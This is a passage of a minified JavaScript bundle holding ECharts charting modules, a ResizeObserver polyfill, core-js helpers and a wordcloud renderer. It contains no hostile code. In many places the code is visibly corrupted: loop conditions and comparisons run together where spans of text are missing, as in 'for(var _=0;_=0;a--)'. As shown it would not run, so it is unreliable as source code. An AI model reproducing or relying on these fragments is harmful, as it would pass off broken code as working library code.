_=i.cx,b=i.cy;d=Math.abs(h[0]-_)/y<.3?"center":h[0]>_?"left":"right",f=Math.abs(h[1]-b)/y<.3?"middle":h[1]>b?"top":"bottom"}return{position:h,align:d,verticalAlign:f}}var d={line:function(e,t,n,i,r){return"angle"===e.dim?{type:"Line",shape:a.makeLineShape(t.coordToPoint([i[0],n]),t.coordToPoint([i[1],n]))}:{type:"Circle",shape:{cx:t.cx,cy:t.cy,r:n}}},shadow:function(e,t,n,i,r){var o=Math.max(1,e.getBandWidth()),s=Math.PI/180;return"angle"===e.dim?{type:"Sector",shape:a.makeSectorShape(t.cx,t.cy,i[0],i[1],(-n-o/2)*s,(o/2-n)*s)}:{type:"Sector",shape:a.makeSectorShape(t.cx,t.cy,n-o/2,n+o/2,0,2*Math.PI)}}};u.registerAxisPointerClass("PolarAxisPointer",c);var f=c;e.exports=f},"6bd4":function(e,t){var n={Russia:[100,60],"United States":[-99,38],"United States of America":[-99,38]};function i(e,t){if("world"===e){var i=n[t.name];if(i){var r=t.center;r[0]=i[0],r[1]=i[1]}}}e.exports=i},"6c12":function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("3eba")),o=n("6d8b"),a=n("fab2"),s=n("2306"),l=["axisLine","axisTickLabel","axisName"],u=r.extendComponentView({type:"radar",render:function(e,t,n){var i=this.group;i.removeAll(),this._buildAxes(e),this._buildSplitLineAndArea(e)},_buildAxes:function(e){var t=e.coordinateSystem,n=t.getIndicatorAxes(),i=o.map(n,(function(e){var n=new a(e.model,{position:[t.cx,t.cy],rotation:e.angle,labelDirection:-1,tickDirection:-1,nameDirection:1});return n}));o.each(i,(function(e){o.each(l,e.add,e),this.group.add(e.getGroup())}),this)},_buildSplitLineAndArea:function(e){var t=e.coordinateSystem,n=t.getIndicatorAxes();if(n.length){var i=e.get("shape"),r=e.getModel("splitLine"),a=e.getModel("splitArea"),l=r.getModel("lineStyle"),u=a.getModel("areaStyle"),c=r.get("show"),h=a.get("show"),d=l.get("color"),f=u.get("color");d=o.isArray(d)?d:[d],f=o.isArray(f)?f:[f];var p=[],g=[];if("circle"===i)for(var m=n[0].getTicksCoords(),v=t.cx,y=t.cy,_=0;_=0;a--)o=i.merge(o,t[a],!0);e.defaultOption=o}return e.defaultOption},getReferringComponents:function(e){return this.ecModel.queryComponents({mainType:e,index:this.get(e+"Index",!0),id:this.get(e+"Id",!0)})}});function g(e){var t=[];return i.each(p.getClassesByMainType(e),(function(e){t=t.concat(e.prototype.dependencies||[])})),t=i.map(t,(function(e){return l(e).main})),"dataset"!==e&&i.indexOf(t,"dataset")<=0&&t.unshift("dataset"),t}s(p,{registerWhenExtend:!0}),o.enableSubTypeDefaulter(p),o.enableTopologicalTravel(p,g),i.mixin(p,d);var m=p;e.exports=m},"6cc5":function(e,t,n){var i=n("6d8b"),r=n("401b"),o=n("1687"),a=n("9850"),s=n("0cde"),l=r.applyTransform;function u(){s.call(this)}function c(e){this.name=e,this.zoomLimit,s.call(this),this._roamTransformable=new u,this._rawTransformable=new u,this._center,this._zoom}function h(e,t,n,i){var r=n.seriesModel,o=r?r.coordinateSystem:null;return o===this?o[e](i):null}i.mixin(u,s),c.prototype={constructor:c,type:"view",dimensions:["x","y"],setBoundingRect:function(e,t,n,i){return this._rect=new a(e,t,n,i),this._rect},getBoundingRect:function(){return this._rect},setViewRect:function(e,t,n,i){this.transformTo(e,t,n,i),this._viewRect=new a(e,t,n,i)},transformTo:function(e,t,n,i){var r=this.getBoundingRect(),o=this._rawTransformable;o.transform=r.calculateTransform(new a(e,t,n,i)),o.decomposeTransform(),this._updateTransform()},setCenter:function(e){e&&(this._center=e,this._updateCenterAndZoom())},setZoom:function(e){e=e||1;var t=this.zoomLimit;t&&(null!=t.max&&(e=Math.min(t.max,e)),null!=t.min&&(e=Math.max(t.min,e))),this._zoom=e,this._updateCenterAndZoom()},getDefaultCenter:function(){var e=this.getBoundingRect(),t=e.x+e.width/2,n=e.y+e.height/2;return[t,n]},getCenter:function(){return this._center||this.getDefaultCenter()},getZoom:function(){return this._zoom||1},getRoamTransform:function(){return this._roamTransformable.getLocalTransform()},_updateCenterAndZoom:function(){var e=this._rawTransformable.getLocalTransform(),t=this._roamTransformable,n=this.getDefaultCenter(),i=this.getCenter(),o=this.getZoom();i=r.applyTransform([],i,e),n=r.applyTransform([],n,e),t.origin=i,t.position=[n[0]-i[0],n[1]-i[1]],t.scale=[o,o],this._updateTransform()},_updateTransform:function(){var e=this._roamTransformable,t=this._rawTransformable;t.parent=e,e.updateTransform(),t.updateTransform(),o.copy(this.transform||(this.transform=[]),t.transform||o.create()),this._rawTransform=t.getLocalTransform(),this.invTransform=this.invTransform||[],o.invert(this.invTransform,this.transform),this.decomposeTransform()},getTransformInfo:function(){var e=this._roamTransformable.transform,t=this._rawTransformable;return{roamTransform:e?i.slice(e):o.create(),rawScale:i.slice(t.scale),rawPosition:i.slice(t.position)}},getViewRect:function(){return this._viewRect},getViewRectAfterRoam:function(){var e=this.getBoundingRect().clone();return e.applyTransform(this.transform),e},dataToPoint:function(e,t,n){var i=t?this._rawTransform:this.transform;return n=n||[],i?l(n,e,i):r.copy(n,e)},pointToData:function(e){var t=this.invTransform;return t?l([],e,t):[e[0],e[1]]},convertToPixel:i.curry(h,"dataToPoint"),convertFromPixel:i.curry(h,"pointToData"),containPoint:function(e){return this.getViewRectAfterRoam().contain(e[0],e[1])}},i.mixin(c,s);var d=c;e.exports=d},"6cd8":function(e,t,n){var i=n("6d8b"),r=n("2306"),o=n("1418"),a=n("22da"),s=a.radialCoordinate,l=n("3eba"),u=n("e263"),c=n("6cc5"),h=n("01ef"),d=n("4a01"),f=n("c526"),p=f.onIrrelevantElement,g=n("4e08"),m=(g.__DEV__,n("3842")),v=m.parsePercent,y=r.extendShape({shape:{parentPoint:[],childPoints:[],orient:"",forkPosition:""},style:{stroke:"#000",fill:null},buildPath:function(e,t){var n=t.childPoints,i=n.length,r=t.parentPoint,o=n[0],a=n[i-1];if(1===i)return e.moveTo(r[0],r[1]),void e.lineTo(o[0],o[1]);var s=t.orient,l="TB"===s||"BT"===s?0:1,u=1-l,c=v(t.forkPosition,1),h=[];h[l]=r[l],h[u]=r[u]+(a[u]-r[u])*c,e.moveTo(r[0],r[1]),e.lineTo(h[0],h[1]),e.moveTo(o[0],o[1]),h[l]=o[l],e.lineTo(h[0],h[1]),h[l]=a[l],e.lineTo(h[0],h[1]),e.lineTo(a[0],a[1]);for(var d=1;dw.x,_||(y-=Math.PI));var A=_?"left":"right",C=s.labelModel.get("rotate"),T=C*(Math.PI/180);v.setStyle({textPosition:s.labelModel.get("position")||A,textRotation:null==C?-y:T,textOrigin:"center",verticalAlign:"middle"})}k(a,u,h,n,g,p,m,i,s)}function k(e,t,n,o,a,s,l,u,c){var h=c.edgeShape,d=o.__edge;if("curve"===h)t.parentNode&&t.parentNode!==n&&(d||(d=o.__edge=new r.BezierCurve({shape:M(c,a,a),style:i.defaults({opacity:0,strokeNoScale:!0},c.lineStyle)})),r.updateProps(d,{shape:M(c,s,l),style:i.defaults({opacity:1},c.lineStyle)},e));else if("polyline"===h&&"orthogonal"===c.layout&&t!==n&&t.children&&0!==t.children.length&&!0===t.isExpand){for(var f=t.children,p=[],g=0;g=0;o--)i.push(r[o])}}t.eachAfter=n,t.eachBefore=i},"6dd8":function(e,t,n){"use strict";n.r(t),function(e){var n=function(){if("undefined"!==typeof Map)return Map;function e(e,t){var n=-1;return e.some((function(e,i){return e[0]===t&&(n=i,!0)})),n}return function(){function t(){this.__entries__=[]}return Object.defineProperty(t.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),t.prototype.get=function(t){var n=e(this.__entries__,t),i=this.__entries__[n];return i&&i[1]},t.prototype.set=function(t,n){var i=e(this.__entries__,t);~i?this.__entries__[i][1]=n:this.__entries__.push([t,n])},t.prototype.delete=function(t){var n=this.__entries__,i=e(n,t);~i&&n.splice(i,1)},t.prototype.has=function(t){return!!~e(this.__entries__,t)},t.prototype.clear=function(){this.__entries__.splice(0)},t.prototype.forEach=function(e,t){void 0===t&&(t=null);for(var n=0,i=this.__entries__;n0},e.prototype.connect_=function(){i&&!this.connected_&&(document.addEventListener("transitionend",this.onTransitionEnd_),window.addEventListener("resize",this.refresh),c?(this.mutationsObserver_=new MutationObserver(this.refresh),this.mutationsObserver_.observe(document,{attributes:!0,childList:!0,characterData:!0,subtree:!0})):(document.addEventListener("DOMSubtreeModified",this.refresh),this.mutationEventsAdded_=!0),this.connected_=!0)},e.prototype.disconnect_=function(){i&&this.connected_&&(document.removeEventListener("transitionend",this.onTransitionEnd_),window.removeEventListener("resize",this.refresh),this.mutationsObserver_&&this.mutationsObserver_.disconnect(),this.mutationEventsAdded_&&document.removeEventListener("DOMSubtreeModified",this.refresh),this.mutationsObserver_=null,this.mutationEventsAdded_=!1,this.connected_=!1)},e.prototype.onTransitionEnd_=function(e){var t=e.propertyName,n=void 0===t?"":t,i=u.some((function(e){return!!~n.indexOf(e)}));i&&this.refresh()},e.getInstance=function(){return this.instance_||(this.instance_=new e),this.instance_},e.instance_=null,e}(),d=function(e,t){for(var n=0,i=Object.keys(t);n0},e}(),T="undefined"!==typeof WeakMap?new WeakMap:new n,I=function(){function e(t){if(!(this instanceof e))throw new TypeError("Cannot call a class as a function.");if(!arguments.length)throw new TypeError("1 argument required, but only 0 present.");var n=h.getInstance(),i=new C(t,n,this);T.set(this,i)}return e}();["observe","unobserve","disconnect"].forEach((function(e){I.prototype[e]=function(){var t;return(t=T.get(this))[e].apply(t,arguments)}}));var D=function(){return"undefined"!==typeof r.ResizeObserver?r.ResizeObserver:I}();t["default"]=D}.call(this,n("c8ba"))},"6eeb":function(e,t,n){var i=n("da84"),r=n("9112"),o=n("5135"),a=n("ce4e"),s=n("8925"),l=n("69f3"),u=l.get,c=l.enforce,h=String(String).split("String");(e.exports=function(e,t,n,s){var l=!!s&&!!s.unsafe,u=!!s&&!!s.enumerable,d=!!s&&!!s.noTargetGet;"function"==typeof n&&("string"!=typeof t||o(n,"name")||r(n,"name",t),c(n).source=h.join("string"==typeof t?t:"")),e!==i?(l?!d&&e[t]&&(u=!0):delete e[t],u?e[t]=n:r(e,t,n)):u?e[t]=n:a(t,n)})(Function.prototype,"toString",(function(){return"function"==typeof this&&u(this).source||s(this)}))},"6f4f":function(e,t,n){var i=n("77e9"),r=n("85e7"),o=n("9742"),a=n("5a94")("IE_PROTO"),s=function(){},l="prototype",u=function(){var e,t=n("05f5")("iframe"),i=o.length,r="<",a=">";t.style.display="none",n("9141").appendChild(t),t.src="javascript:",e=t.contentWindow.document,e.open(),e.write(r+"script"+a+"document.F=Object"+r+"/script"+a),e.close(),u=e.F;while(i--)delete u[l][o[i]];return u()};e.exports=Object.create||function(e,t){var n;return null!==e?(s[l]=i(e),n=new s,s[l]=null,n[a]=e):n=u(),void 0===t?n:r(n,t)}},"6fda":function(e,t,n){var i=n("6d8b"),r=i.each,o="\0_ec_hist_store";function a(e,t){var n=c(e);r(t,(function(t,i){for(var r=n.length-1;r>=0;r--){var o=n[r];if(o[i])break}if(r<0){var a=e.queryComponents({mainType:"dataZoom",subType:"select",id:i})[0];if(a){var s=a.getPercentRange();n[0][i]={dataZoomId:i,start:s[0],end:s[1]}}}})),n.push(t)}function s(e){var t=c(e),n=t[t.length-1];t.length>1&&t.pop();var i={};return r(n,(function(e,n){for(var r=t.length-1;r>=0;r--){e=t[r][n];if(e){i[n]=e;break}}})),i}function l(e){e[o]=null}function u(e){return c(e).length}function c(e){var t=e[o];return t||(t=e[o]=[{}]),t}t.push=a,t.pop=s,t.clear=l,t.count=u},7023:function(e,t,n){var i=n("6d8b"),r={updateSelectedMap:function(e){this._targetList=i.isArray(e)?e.slice():[],this._selectTargetMap=i.reduce(e||[],(function(e,t){return e.set(t.name,t),e}),i.createHashMap())},select:function(e,t){var n=null!=t?this._targetList[t]:this._selectTargetMap.get(e),i=this.get("selectedMode");"single"===i&&this._selectTargetMap.each((function(e){e.selected=!1})),n&&(n.selected=!0)},unSelect:function(e,t){var n=null!=t?this._targetList[t]:this._selectTargetMap.get(e);n&&(n.selected=!1)},toggleSelected:function(e,t){var n=null!=t?this._targetList[t]:this._selectTargetMap.get(e);if(null!=n)return this[n.selected?"unSelect":"select"](e,t),n.selected},isSelected:function(e,t){var n=null!=t?this._targetList[t]:this._selectTargetMap.get(e);return n&&n.selected}};e.exports=r},7156:function(e,t,n){var i=n("861d"),r=n("d2bb");e.exports=function(e,t,n){var o,a;return r&&"function"==typeof(o=t.constructor)&&o!==n&&i(a=o.prototype)&&a!==n.prototype&&r(e,a),e}},"71ad":function(e,t,n){var i=n("6d8b"),r={show:!0,zlevel:0,z:0,inverse:!1,name:"",nameLocation:"end",nameRotate:null,nameTruncate:{maxWidth:null,ellipsis:"...",placeholder:"."},nameTextStyle:{},nameGap:15,silent:!1,triggerEvent:!1,tooltip:{show:!1},axisPointer:{},axisLine:{show:!0,onZero:!0,onZeroAxisIndex:null,lineStyle:{color:"#333",width:1,type:"solid"},symbol:["none","none"],symbolSize:[10,15]},axisTick:{show:!0,inside:!1,length:5,lineStyle:{width:1}},axisLabel:{show:!0,inside:!1,rotate:0,showMinLabel:null,showMaxLabel:null,margin:8,fontSize:12},splitLine:{show:!0,lineStyle:{color:["#ccc"],width:1,type:"solid"}},splitArea:{show:!1,areaStyle:{color:["rgba(250,250,250,0.3)","rgba(200,200,200,0.3)"]}}},o={};o.categoryAxis=i.merge({boundaryGap:!0,deduplication:null,splitLine:{show:!1},axisTick:{alignWithLabel:!1,interval:"auto"},axisLabel:{interval:"auto"}},r),o.valueAxis=i.merge({boundaryGap:[0,0],splitNumber:5,minorTick:{show:!1,splitNumber:5,length:3,lineStyle:{}},minorSplitLine:{show:!1,lineStyle:{color:"#eee",width:1}}},r),o.timeAxis=i.defaults({scale:!0,min:"dataMin",max:"dataMax"},o.valueAxis),o.logAxis=i.defaults({scale:!0,logBase:10},o.valueAxis);var a=o;e.exports=a},"71b2":function(e,t,n){var i=n("6d8b"),r=i.createHashMap;function o(e){e.eachSeriesByType("themeRiver",(function(e){var t=e.getData(),n=e.getRawData(),i=e.get("color"),o=r();t.each((function(e){o.set(t.getRawIndex(e),e)})),n.each((function(r){var a=n.getName(r),s=i[(e.nameMap.get(a)-1)%i.length];n.setItemVisual(r,"color",s);var l=o.get(r);null!=l&&t.setItemVisual(l,"color",s)}))}))}e.exports=o},7293:function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("4f85")),o=n("6179"),a=n("6d8b"),s=a.concatArray,l=a.mergeAll,u=a.map,c=n("eda2"),h=c.encodeHTML,d=(n("2039"),"undefined"===typeof Uint32Array?Array:Uint32Array),f="undefined"===typeof Float64Array?Array:Float64Array;function p(e){var t=e.data;t&&t[0]&&t[0][0]&&t[0][0].coord&&(e.data=u(t,(function(e){var t=[e[0].coord,e[1].coord],n={coords:t};return e[0].name&&(n.fromName=e[0].name),e[1].name&&(n.toName=e[1].name),l([n,e[0],e[1]])})))}var g=r.extend({type:"series.lines",dependencies:["grid","polar"],visualColorAccessPath:"lineStyle.color",init:function(e){e.data=e.data||[],p(e);var t=this._processFlatCoordsArray(e.data);this._flatCoords=t.flatCoords,this._flatCoordsOffset=t.flatCoordsOffset,t.flatCoords&&(e.data=new Float32Array(t.count)),g.superApply(this,"init",arguments)},mergeOption:function(e){if(p(e),e.data){var t=this._processFlatCoordsArray(e.data);this._flatCoords=t.flatCoords,this._flatCoordsOffset=t.flatCoordsOffset,t.flatCoords&&(e.data=new Float32Array(t.count))}g.superApply(this,"mergeOption",arguments)},appendData:function(e){var t=this._processFlatCoordsArray(e.data);t.flatCoords&&(this._flatCoords?(this._flatCoords=s(this._flatCoords,t.flatCoords),this._flatCoordsOffset=s(this._flatCoordsOffset,t.flatCoordsOffset)):(this._flatCoords=t.flatCoords,this._flatCoordsOffset=t.flatCoordsOffset),e.data=new Float32Array(t.count)),this.getRawData().appendData(e.data)},_getCoordsFromItemModel:function(e){var t=this.getData().getItemModel(e),n=t.option instanceof Array?t.option:t.getShallow("coords");return n},getLineCoordsCount:function(e){return this._flatCoordsOffset?this._flatCoordsOffset[2*e+1]:this._getCoordsFromItemModel(e).length},getLineCoords:function(e,t){if(this._flatCoordsOffset){for(var n=this._flatCoordsOffset[2*e],i=this._flatCoordsOffset[2*e+1],r=0;r "))},preventIncremental:function(){return!!this.get("effect.show")},getProgressive:function(){var e=this.option.progressive;return null==e?this.option.large?1e4:this.get("progressive"):e},getProgressiveThreshold:function(){var e=this.option.progressiveThreshold;return null==e?this.option.large?2e4:this.get("progressiveThreshold"):e},defaultOption:{coordinateSystem:"geo",zlevel:0,z:2,legendHoverLink:!0,hoverAnimation:!0,xAxisIndex:0,yAxisIndex:0,symbol:["none","none"],symbolSize:[10,10],geoIndex:0,effect:{show:!1,period:4,constantSpeed:0,symbol:"circle",symbolSize:3,loop:!0,trailLength:.2},large:!1,largeThreshold:2e3,polyline:!1,clip:!0,label:{show:!1,position:"end"},lineStyle:{opacity:.5}}}),m=g;e.exports=m},"72b6":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("2306"),a=n("eda2"),s=n("f934"),l=n("5f14"),u=i.extendComponentView({type:"visualMap",autoPositionValues:{left:1,right:1,top:1,bottom:1},init:function(e,t){this.ecModel=e,this.api=t,this.visualMapModel},render:function(e,t,n,i){this.visualMapModel=e,!1!==e.get("show")?this.doRender.apply(this,arguments):this.group.removeAll()},renderBackground:function(e){var t=this.visualMapModel,n=a.normalizeCssArray(t.get("padding")||0),i=e.getBoundingRect();e.add(new o.Rect({z2:-1,silent:!0,shape:{x:i.x-n[3],y:i.y-n[0],width:i.width+n[3]+n[1],height:i.height+n[0]+n[2]},style:{fill:t.get("backgroundColor"),stroke:t.get("borderColor"),lineWidth:t.get("borderWidth")}}))},getControllerVisual:function(e,t,n){n=n||{};var i=n.forceState,o=this.visualMapModel,a={};if("symbol"===t&&(a.symbol=o.get("itemSymbol")),"color"===t){var s=o.get("contentColor");a.color=s}function u(e){return a[e]}function c(e,t){a[e]=t}var h=o.controllerVisuals[i||o.getValueState(e)],d=l.prepareVisualTypes(h);return r.each(d,(function(i){var r=h[i];n.convertOpacityToAlpha&&"opacity"===i&&(i="colorAlpha",r=h.__alphaForOpacity),l.dependsOn(i,t)&&r&&r.applyVisual(e,u,c)})),a[t]},positionGroup:function(e){var t=this.visualMapModel,n=this.api;s.positionElement(e,t.getBoxLayoutParams(),{width:n.getWidth(),height:n.getHeight()})},doRender:r.noop});e.exports=u},7368:function(e,t,n){var i=n("4e08"),r=(i.__DEV__,n("6d8b")),o=n("625e"),a=o.enableClassCheck;function s(e){return"_EC_"+e}var l=function(e){this._directed=e||!1,this.nodes=[],this.edges=[],this._nodesMap={},this._edgesMap={},this.data,this.edgeData},u=l.prototype;function c(e,t){this.id=null==e?"":e,this.inEdges=[],this.outEdges=[],this.edges=[],this.hostGraph,this.dataIndex=null==t?-1:t}function h(e,t,n){this.node1=e,this.node2=t,this.dataIndex=null==n?-1:n}u.type="graph",u.isDirected=function(){return this._directed},u.addNode=function(e,t){e=null==e?""+t:""+e;var n=this._nodesMap;if(!n[s(e)]){var i=new c(e,t);return i.hostGraph=this,this.nodes.push(i),n[s(e)]=i,i}},u.getNodeByIndex=function(e){var t=this.data.getRawIndex(e);return this.nodes[t]},u.getNodeById=function(e){return this._nodesMap[s(e)]},u.addEdge=function(e,t,n){var i=this._nodesMap,r=this._edgesMap;if("number"===typeof e&&(e=this.nodes[e]),"number"===typeof t&&(t=this.nodes[t]),c.isInstance(e)||(e=i[s(e)]),c.isInstance(t)||(t=i[s(t)]),e&&t){var o=e.id+"-"+t.id,a=new h(e,t,n);return a.hostGraph=this,this._directed&&(e.outEdges.push(a),t.inEdges.push(a)),e.edges.push(a),e!==t&&t.edges.push(a),this.edges.push(a),r[o]=a,a}},u.getEdgeByIndex=function(e){var t=this.edgeData.getRawIndex(e);return this.edges[t]},u.getEdge=function(e,t){c.isInstance(e)&&(e=e.id),c.isInstance(t)&&(t=t.id);var n=this._edgesMap;return this._directed?n[e+"-"+t]:n[e+"-"+t]||n[t+"-"+e]},u.eachNode=function(e,t){for(var n=this.nodes,i=n.length,r=0;r=0&&e.call(t,n[r],r)},u.eachEdge=function(e,t){for(var n=this.edges,i=n.length,r=0;r=0&&n[r].node1.dataIndex>=0&&n[r].node2.dataIndex>=0&&e.call(t,n[r],r)},u.breadthFirstTraverse=function(e,t,n,i){if(c.isInstance(t)||(t=this._nodesMap[s(t)]),t){for(var r="out"===n?"outEdges":"in"===n?"inEdges":"edges",o=0;o=0&&n.node2.dataIndex>=0}));for(r=0,o=i.length;r=0&&this[e][t].setItemVisual(this.dataIndex,n,i)},getVisual:function(n,i){return this[e][t].getItemVisual(this.dataIndex,n,i)},setLayout:function(n,i){this.dataIndex>=0&&this[e][t].setItemLayout(this.dataIndex,n,i)},getLayout:function(){return this[e][t].getItemLayout(this.dataIndex)},getGraphicEl:function(){return this[e][t].getItemGraphicEl(this.dataIndex)},getRawIndex:function(){return this[e][t].getRawIndex(this.dataIndex)}}};r.mixin(c,d("hostGraph","data")),r.mixin(h,d("hostGraph","edgeData")),l.Node=c,l.Edge=h,a(c),a(h);var f=l;e.exports=f},"73ca":function(e,t,n){var i=n("2306"),r=n("7e5b");function o(e){this._ctor=e||r,this.group=new i.Group}var a=o.prototype;function s(e,t,n,i){var r=t.getItemLayout(n);if(d(r)){var o=new e._ctor(t,n,i);t.setItemGraphicEl(n,o),e.group.add(o)}}function l(e,t,n,i,r,o){var a=t.getItemGraphicEl(i);d(n.getItemLayout(r))?(a?a.updateData(n,r,o):a=new e._ctor(n,r,o),n.setItemGraphicEl(r,a),e.group.add(a)):e.group.remove(a)}function u(e){return e.animators&&e.animators.length>0}function c(e){var t=e.hostModel;return{lineStyle:t.getModel("lineStyle").getLineStyle(),hoverLineStyle:t.getModel("emphasis.lineStyle").getLineStyle(),labelModel:t.getModel("label"),hoverLabelModel:t.getModel("emphasis.label")}}function h(e){return isNaN(e[0])||isNaN(e[1])}function d(e){return!h(e[0])&&!h(e[1])}a.isPersistent=function(){return!0},a.updateData=function(e){var t=this,n=t.group,i=t._lineData;t._lineData=e,i||n.removeAll();var r=c(e);e.diff(i).add((function(n){s(t,e,n,r)})).update((function(n,o){l(t,i,e,o,n,r)})).remove((function(e){n.remove(i.getItemGraphicEl(e))})).execute()},a.updateLayout=function(){var e=this._lineData;e&&e.eachItemGraphicEl((function(t,n){t.updateLayout(e,n)}),this)},a.incrementalPrepareUpdate=function(e){this._seriesScope=c(e),this._lineData=null,this.group.removeAll()},a.incrementalUpdate=function(e,t){function n(e){e.isGroup||u(e)||(e.incremental=e.useHoverLayer=!0)}for(var i=e.start;i=0)return!0}var v=new RegExp("["+c+"]+","g");function y(e){for(var t=e.split(/\n+/g),n=g(t.shift()).split(v),i=[],o=r.map(n,(function(e){return{name:e,data:[]}})),a=0;a=0?1/(Math.cos(2*Math.PI/10-t)+3.07768*Math.sin(2*Math.PI/10-t)):1/(Math.cos(t)+3.07768*Math.sin(t))};break}n.gridSize=Math.max(Math.floor(n.gridSize),4);var l,u,c,h,d,f,p,g=n.gridSize,m=g-n.maskGapWidth,v=Math.abs(n.maxRotation-n.minRotation),y=Math.min(n.maxRotation,n.minRotation),_=n.rotationStep;switch(n.color){case"random-dark":p=function(){return V(10,50)};break;case"random-light":p=function(){return V(50,90)};break;default:"function"===typeof n.color&&(p=n.color);break}var b=null;"function"===typeof n.classes&&(b=n.classes);var x,w=!1,k=[],S=function(e){var t,n,i=e.currentTarget,r=i.getBoundingClientRect();e.touches?(t=e.touches[0].clientX,n=e.touches[0].clientY):(t=e.clientX,n=e.clientY);var o=t-r.left,a=n-r.top,s=Math.floor(o*(i.width/r.width||1)/g),l=Math.floor(a*(i.height/r.height||1)/g);return k[s][l]},M=function(e){var t=S(e);x!==t&&(x=t,t?n.hover(t.item,t.dimension,e):n.hover(void 0,void 0,e))},A=function(e){var t=S(e);t&&(n.click(t.item,t.dimension,e),e.preventDefault())},C=[],T=function(e){if(C[e])return C[e];var t=8*e,i=t,r=[];0===e&&r.push([h[0],h[1],0]);while(i--){var o=1;"circle"!==n.shape&&(o=n.shape(i/t*2*Math.PI)),r.push([h[0]+e*o*Math.cos(-i/t*2*Math.PI),h[1]+e*o*Math.sin(-i/t*2*Math.PI)*n.ellipticity,i/t*2*Math.PI])}return C[e]=r,r},I=function(){return n.abortThreshold>0&&(new Date).getTime()-f>n.abortThreshold},D=function(){return 0===n.rotateRatio||Math.random()>n.rotateRatio?0:0===v?y:y+Math.round(Math.random()*v/_)*_},L=function(e,t,i){var r=!1,o=n.weightFactor(t);if(o<=n.minSize)return!1;var s=1;oD[1]&&(D[1]=T),SD[2]&&(D[2]=S),r&&(u.fillStyle="rgba(255, 0, 0, 0.5)",u.fillRect(T*g,S*g,g-.5,g-.5));break e}}r&&(u.fillStyle="rgba(0, 0, 255, 0.5)",u.fillRect(T*g,S*g,g-.5,g-.5))}}}return r&&(u.fillStyle="rgba(0, 255, 0, 0.5)",u.fillRect(D[3]*g,D[0]*g,(D[1]-D[3]+1)*g,(D[2]-D[0]+1)*g)),{mu:s,occupied:C,bounds:D,gw:b,gh:_,fillTextOffsetX:v,fillTextOffsetY:y,fillTextWidth:c,fillTextHeight:h,fontSize:o}},E=function(e,t,i,r,o){var a=o.length;while(a--){var s=e+o[a][0],h=t+o[a][1];if(s>=u||h>=c||s<0||h<0){if(!n.drawOutOfBound)return!1}else if(!l[s][h])return!1}return!0},O=function(t,i,r,o,a,s,l,u,c){var h,d,f=r.fontSize;h=p?p(o,a,f,s,l):n.color,d=b?b(o,a,f,s,l):n.classes;var m=r.bounds;m[3],m[0],m[1],m[3],m[2],m[0],e.forEach((function(e){if(e.getContext){var a=e.getContext("2d"),s=r.mu;a.save(),a.scale(1/s,1/s),a.font=n.fontWeight+" "+(f*s).toString(10)+"px "+n.fontFamily,a.fillStyle=h,a.translate((t+r.gw/2)*g*s,(i+r.gh/2)*g*s),0!==u&&a.rotate(-u),a.textBaseline="middle",a.fillText(o,r.fillTextOffsetX*s,(r.fillTextOffsetY+.5*f)*s),a.restore()}else{var l=document.createElement("span"),p="";p="rotate("+-u/Math.PI*180+"deg) ",1!==r.mu&&(p+="translateX(-"+r.fillTextWidth/4+"px) scale("+1/r.mu+")");var m={position:"absolute",display:"block",font:n.fontWeight+" "+f*r.mu+"px "+n.fontFamily,left:(t+r.gw/2)*g+r.fillTextOffsetX+"px",top:(i+r.gh/2)*g+r.fillTextOffsetY+"px",width:r.fillTextWidth+"px",height:r.fillTextHeight+"px",lineHeight:f+"px",whiteSpace:"nowrap",transform:p,webkitTransform:p,msTransform:p,transformOrigin:"50% 40%",webkitTransformOrigin:"50% 40%",msTransformOrigin:"50% 40%"};for(var v in h&&(m.color=h),l.textContent=o,m)l.style[v]=m[v];if(c)for(var y in c)l.setAttribute(y,c[y]);d&&(l.className+=d),e.appendChild(l)}}))},P=function(t,n,i,r,o){if(!(t>=u||n>=c||t<0||n<0)){if(l[t][n]=!1,i){var a=e[0].getContext("2d");a.fillRect(t*g,n*g,m,m)}w&&(k[t][n]={item:o,dimension:r})}},R=function(t,i,r,o,a,s){var l,h,d=a.occupied,f=n.drawMask;if(f&&(l=e[0].getContext("2d"),l.save(),l.fillStyle=n.maskColor),w){var p=a.bounds;h={x:(t+p[3])*g,y:(i+p[0])*g,w:(p[1]-p[3]+1)*g,h:(p[2]-p[0]+1)*g}}var m=d.length;while(m--){var v=t+d[m][0],y=i+d[m][1];v>=u||y>=c||v<0||y<0||P(v,y,f,h,s)}f&&l.restore()},N=function(e){var t,i,r;Array.isArray(e)?(t=e[0],i=e[1]):(t=e.word,i=e.weight,r=e.attributes);var o=D(),a=L(t,i,o);if(!a)return!1;if(I())return!1;if(!n.drawOutOfBound){var l=a.bounds;if(l[1]-l[3]+1>u||l[2]-l[0]+1>c)return!1}var h=d+1,f=function(n){var s=Math.floor(n[0]-a.gw/2),l=Math.floor(n[1]-a.gh/2),u=a.gw,c=a.gh;return!!E(s,l,u,c,a.occupied)&&(O(s,l,a,t,i,d-h,n[2],o,r),R(s,l,u,c,a,e),{gx:s,gy:l,rot:o,info:a})};while(h--){var p=T(d-h);n.shuffle&&(p=[].concat(p),s(p));for(var g=0;g=n.list.length)return p(D),z("wordcloudstop",!1),void C("wordcloudstart",T);f=(new Date).getTime();var t=N(n.list[a]),i=!z("wordclouddrawn",!0,{item:n.list[a],drawn:t});if(I()||i)return p(D),n.abort(),z("wordcloudabort",!1),z("wordcloudstop",!1),void C("wordcloudstart",T);a++,D=s(e,n.wait)}),n.wait)}};F()}function V(e,t){return"hsl("+(360*Math.random()).toFixed()+","+(30*Math.random()+70).toFixed()+"%,"+(Math.random()*(t-e)+e).toFixed()+"%)"}};l.isSupported=o,l.minFontSize=a,i=[],r=function(){return l}.apply(t,i),void 0===r||(e.exports=r)}()},"7a41":function(e,t){e.exports=function(e){return"object"===typeof e?null!==e:"function"===typeof e}},"7b0b":function(e,t,n){var i=n("1d80");e.exports=function(e){return Object(i(e))}},"7b0c":function(e,t,n){var i=n("6cc5"),r=n("f934"),o=r.getLayoutRect,a=n("e263");function s(e,t,n){var i=e.getBoxLayoutParams();return i.aspect=n,o(i,{width:t.getWidth(),height:t.getHeight()})}function l(e,t){var n=[];return e.eachSeriesByType("graph",(function(e){var r=e.get("coordinateSystem");if(!r||"view"===r){var o=e.getData(),l=o.mapArray((function(e){var 